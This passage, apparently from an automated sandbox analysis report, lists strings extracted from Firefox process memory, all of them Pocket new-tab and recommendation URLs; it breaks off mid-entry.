Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.